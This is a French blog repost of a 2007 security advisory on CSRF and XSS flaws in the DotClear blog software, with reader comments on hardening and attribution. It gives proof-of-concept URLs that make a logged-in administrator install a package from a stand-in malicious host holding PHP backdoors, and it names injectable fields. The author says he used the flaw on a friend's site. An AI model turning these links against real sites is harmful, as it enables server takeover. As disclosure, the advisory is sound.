[ALERTE] Faille DotClear

SckyzO | 11 juillet 2007 | 12:34

Source : http://ar3av.free.fr/faille-dotclear.php

Bulletin de sécurité
http://ar3av.free.fr/faille-dotclear.php
=======================================

Software: DotClear
Date: 08 Juillet 2007
Versions affectées: 1.2.6 et versions antérieures / 2.0 beta 6 et versions antérieures
Type de la faille: CSRF & XSS
Découvreur: PsychoGun

DotClear est un blog populaire écrit en PHP dans lequel j’ai découvert de nombreuses vulnérabilités. Cette application web offre à son administrateur une interface de gestion qui permet de le configurer, mais le problème réside dans le fait que cette interface ne respecte pas les conventions rudimentaires de sécurité. Ainsi le blog ne vérifie jamais correctement la provenance des données qui lui sont envoyées, et c’est pourquoi il est possible de faire accomplir des actions à l’administrateur sans son consentement.

Pour peu qu’il soit logué sur son compte, on peut faire supprimer, activer ou désactiver des plugins à l’administrateur. On peut aussi lui faire ajouter des plugins infectés par des backdoor écrites en php et prendre, de cette manière, le contrôle du serveur. A noter que le plugin qui permet d’en ajouter d’autres fait partie de la configuration minimale de DotClear. J’ai déjà exploité cette faille pour faire une plaisanterie à un ami. Son site était composé d’un blog et d’un forum. J’ai posté une fausse image sur son forum qui réalisait une re-direction vers une url de ce type:

http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng

Sans le savoir, en ne cliquant sur aucun lien et en visualisant une page de son propre site, l’administrateur à installé une backdoor écrite en php sur son serveur. J’avais donc obtenu le contrôle de ce serveur grâce à une vulnérabilité de DotClear aussi stupéfiante que facile à exploiter. Mon fichier “malicious-file.pkg.gz” a été produit avec un outil de DotClear et il contenait des fichiers php qui ont donc été placés sur le serveur. Il ne devrait pas être possible de faire ce genre de choses, et c’est parce que DotClear n’utilise pas un système de token qu’il est vulnérable. Cette faille est présente partout ailleurs sur le blog.
On retrouve cette même faille dans la partie du blog sui sert à gérer les thèmes. Encore une fois on peut faire supprimer, activer ou désactiver des thèmes à l’administrateur. On peut aussi lui faire ajouter de nouveaux thèmes contenant des fichier php qui serviraient de backdoor. Voici un proof of concept :

http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/evil.pkg.gz&p=thememng

Lorsque l’administrateur clique sur ce lien ou lorsqu’il qu’il visualise une page web(qui peut être la sienne) qui contient ce lien(dans une image ou une iframe par exemple), les backdoors écrites en php sont alors copiés sur le serveur visé.

On peut faire mettre n’importe quoi à l’administrateur dans les champs de cette page:

http://victim.com/dotclear/ecrire/tools.php?p=blogconf

parce qu’encore une fois le blog ne vérifie pas la provenance des données, par ailleurs le champs contenant le nom du blog peut recevoir du code Javascript et peut par conséquent être utilisé pour mener à bien des attaques de type cross site scripting.

Sur cette page:

http://victim.com/dotclear/ecrire/tools.php?p=blogroll

On peut faire placer des nouveaux liens ou des nouvelles rubriques à l’administrateur. On peut aussi lui faire effacer des liens ou des rubriques. Cette page présente aussi une faille Xss car on peut placer du code javascript dans ses champs et celui-ci est à chaque fois interprété (dans la partie admin). Le javascript inséré dans le champs “rubrique” est lui aussi interprété sur la 1ère la page du blog(page visible pour tout le monde).
Il est très facile de faire créer à l’administrateur des profiles d’utilisateurs ayant les mêmes pouvoirs que lui. Il suffit de lui faire visiter une page qui contient un code HTML similaire à celui-ci:

============================

Lire la suite de l’article et des astuces sur le site officiel à la demande de l’auteur : http://ar3av.free.fr/faille-dotclear.php

Aucun tag pour cet article.

Articles relatifs

  • Aucun article relatif.
Catégories
Sécurité, Ubuntu
Flux rss des commentaires
Flux rss des commentaires
Trackback
Trackback

« OpenMoko, Le premier téléphone Open Source Ouverture au Planet sur le monde IRC »

10 réponses

Tux-planet

Sécuriser l'interface d'administration de dotclear... Voici une petite astuce trouvée sur

Tux-planet | 11 juillet 2007 | 13:39

Sécuriser l’interface d’administration de dotclear…

Voici une petite astuce trouvée sur le blog officiel de dotclear, qui consiste à changer le nom du dossier d’administration afin de se prémunir d’éventuelles attaques….

Pti-seb

D'où mon récent billet sur comment sécuriser l'interface d'administration de

Pti-seb | 11 juillet 2007 | 13:43

D’où mon récent billet sur comment sécuriser l’interface d’administration de dotclear :
http://www.tux-planet.fr/blog/?2007/07/10/166-securiser-l-interface-d-administration-de-dotclear

SckyzO

Edit du 10/07/2007(18H20): Les responsables du projet DotClear ont émis

SckyzO | 11 juillet 2007 | 13:47

Edit du 10/07/2007(18H20): Les responsables du projet DotClear ont émis un article dans lequel ils affirment que le fait de renommer des répertoires met les utilisateurs à l’abri de probables attaques. Sachez que cette allégation est absolument fausse. Le mieux reste, par conséquent, de s’en tenir à la recommandation faite ci-dessus.

eon

Je comprend pas tout mais c'est dingue ce truc. Comment

eon | 11 juillet 2007 | 13:59

Je comprend pas tout mais c’est dingue ce truc. Comment un code que je visualise pourrait corrompre le système? les plugins en php ne peuvent pas remonter jusqu’à l’admin du serveur tout de meme?

Enfin, il doit avoir raison surement, j’y connais rien.

SckyzO

C'est l'exploitation de faille php dans un code mal fait

SckyzO | 11 juillet 2007 | 14:33

C’est l’exploitation de faille php dans un code mal fait :-)
Tout simplement, comme il en existe pour WP ou autre CMS, car au fond, c’est pas que c’est mal fait, c’est qu’il y a tellement de code qui traine que forcement, tout n’est pas parfait !

JoeGuillian

Salut SckyzO, Je suis l’auteur de l’article qui a été copié/collé

JoeGuillian | 14 juillet 2007 | 20:39

Salut SckyzO,
Je suis l’auteur de l’article qui a été copié/collé ci-dessus.
Veux tu bien ne citer qu’une partie de mon article et mettre un lien vers mon site pour que les gens puissent y lire la suite plutôt que de le reprendre dans son intégralité … ?

SckyzO

Voila :) Ca te va comme ca ? crdlt SckyzO

SckyzO | 16 juillet 2007 | 13:39

Voila :)
Ca te va comme ca ?

crdlt

SckyzO

xss666

je pense que skyzo se fiche de toi, Joe. hahahahhaah

xss666 | 18 juillet 2007 | 21:52

je pense que skyzo se fiche de toi, Joe.

hahahahhaah

SckyzO

Absolument pas, sinon je demanderai pas !! Et si ca va

SckyzO | 20 juillet 2007 | 0:40

Absolument pas, sinon je demanderai pas !!
Et si ca va pas, qu’on me le dise ! I am Very Open :)

horaires SNCF

ça craind tout de meme ces failles !

horaires SNCF | 7 août 2007 | 20:15

ça craind tout de meme ces failles !

Laisser un commentaire

Vous pouvez utiliser ces balises html : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>